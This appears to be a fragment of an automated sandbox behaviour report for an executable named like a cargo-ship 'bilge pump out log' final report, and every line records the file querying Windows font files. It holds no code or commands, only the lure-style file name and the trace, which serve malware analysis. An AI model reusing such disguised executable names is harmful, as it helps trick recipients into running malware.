Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
